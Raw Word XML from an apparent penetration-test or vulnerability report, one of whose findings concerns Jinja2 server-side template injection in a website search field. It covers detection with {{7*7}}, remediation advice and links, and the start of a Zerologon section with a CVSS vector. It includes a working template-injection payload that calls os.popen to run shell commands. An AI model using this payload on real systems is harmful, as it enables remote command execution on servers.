          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all of</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03AF82E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the data the website hosts.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03AF82E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This can lead to sensitive data being leaked, violating certain data pro</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03AF82E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tection laws. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="15726823" w14:textId="7706CC7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51B608D" w:rsidP="0D325B6E" w:rsidRDefault="451B608D" w14:paraId="4F119D47" w14:textId="2400CB5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57216608" w14:textId="05D9EDB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B00561F" w:rsidP="0D325B6E" w:rsidRDefault="1B00561F" w14:paraId="4729EB4A" w14:textId="4C8F6B34">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00561F">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Find website with search input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="47211310" w:rsidP="0D325B6E" w:rsidRDefault="47211310" w14:paraId="20C8F72C" w14:textId="3CACBFE7">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211310">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 xml:space="preserve">Input {{7*7}} and find the output to be 49, showing that </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it</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 xml:space="preserve"> executed the code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="14B5C51F" w:rsidP="0D325B6E" w:rsidRDefault="14B5C51F" w14:paraId="005AA5F6" w14:textId="4E28715E">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B5C51F">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Inpu</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{{ se</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lf</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>._</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TemplateReferen</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ce</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>context.cycler.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>globals</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.os.pop</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('i</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d'</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).re</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5965A525">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>} to run arbitrary shell commands on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="55395E01" w14:textId="7EDBAC2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51B608D" w:rsidP="0D325B6E" w:rsidRDefault="451B608D" w14:paraId="0C512909" w14:textId="2F3A7D51">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614E5E8" w:rsidP="0D325B6E" w:rsidRDefault="4614E5E8" w14:paraId="08A40995" w14:textId="6DD9AAFC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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14E5E8">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614E5E8">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95B5F14" w:rsidP="0D325B6E" w:rsidRDefault="195B5F14" w14:paraId="3DCC9210" w14:textId="7C8A7A90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>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95B5F14">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tiliz</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6E6569E7">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C9321CB">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the templating </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C9321CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>engine’s</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built in </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render</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function instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C9321CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>render_string</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C9321CB">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function</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04B4FB67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>en</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sure that the input is properly </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sanitized</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25A4041D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49DAF104" w:rsidP="0D325B6E" w:rsidRDefault="49DAF104" w14:paraId="0E0CEED0" w14:textId="0DA239EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>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9DAF104">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilize</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a web application </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4B0B9AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(WAF) </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C9321CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to block d</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="242AE0EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>angerous requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="74F4A5A5" w:rsidP="0D325B6E" w:rsidRDefault="74F4A5A5" w14:paraId="3C936F10" w14:textId="179D4576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>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4F4A5A5">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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1675767F" w14:textId="24D972BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="451B608D" w:rsidP="0D325B6E" w:rsidRDefault="451B608D" w14:paraId="729B172A" w14:textId="6BF6FCF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1B608D">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DE946F4" w:rsidP="0D325B6E" w:rsidRDefault="2DE946F4" w14:paraId="22CABBE3" w14:textId="6C01A3CC">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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R31331bc353f84dcf">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="2DE946F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Jinja2 API Documentation for User Sanitization</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7B873A05" w:rsidP="0D325B6E" w:rsidRDefault="7B873A05" w14:paraId="56C2BA5D" w14:textId="038D8E72">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R2a5c96fd65384969">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="7B873A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto Networks: How to Deploy Web Application Firewalls</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1DAFFB4D" w14:textId="23FA9FE0">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RDefault="0D325B6E" w14:paraId="5A7302EF" w14:textId="34E3EDAB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0EC55570" w:rsidP="0D325B6E" w:rsidRDefault="0EC55570" w14:paraId="1A3FD9E4" w14:textId="7DD62C3E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1239149977" w:id="520029050"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0EC55570">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0EC55570">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1545749650" w:id="282658682"/>
      <w:bookmarkStart w:name="_Toc170630774" w:id="1284042546"/>
      <w:bookmarkStart w:name="_Toc1815218315" w:id="231692866"/>
      <w:bookmarkStart w:name="_Toc1847776676" w:id="1260443474"/>
      <w:bookmarkStart w:name="_Toc1564126731" w:id="545103566"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6AA10131">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1634635595" w:id="929364128"/>
      <w:bookmarkStart w:name="_Toc340928676" w:id="225150561"/>
      <w:bookmarkStart w:name="_Toc531947616" w:id="339699753"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4A735DCF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4A735DCF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Zero</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4A735DCF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4A735DCF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:bookmarkEnd w:id="929364128"/>
      <w:bookmarkEnd w:id="225150561"/>
      <w:bookmarkEnd w:id="339699753"/>
      <w:bookmarkEnd w:id="282658682"/>
      <w:bookmarkEnd w:id="1284042546"/>
      <w:bookmarkEnd w:id="231692866"/>
      <w:bookmarkEnd w:id="1260443474"/>
      <w:bookmarkEnd w:id="545103566"/>
      <w:bookmarkEnd w:id="52002905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027DC5D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AA2D81" w14:textId="12063B2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6E8C266" w14:textId="502559F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C932DEA" w14:textId="282D00F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5BC3139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7D9D19" w14:textId="526CA7D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AEBBD8E" w14:textId="1056538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4149A50" w14:textId="63AEA240">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59225369" w14:textId="121B654E">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74CE05A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4C24628" w14:textId="7B5CAFD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6A88EB8" w14:textId="1BEA7130">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E251361"/>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55C3AE6"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="21A13D6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D719EA3" w14:textId="75D22A1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02D654C" w:rsidP="0D325B6E" w:rsidRDefault="502D654C" w14:paraId="73C58F94" w14:textId="01533A60">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" r:id="Rf825ef4017584dba">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AC:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
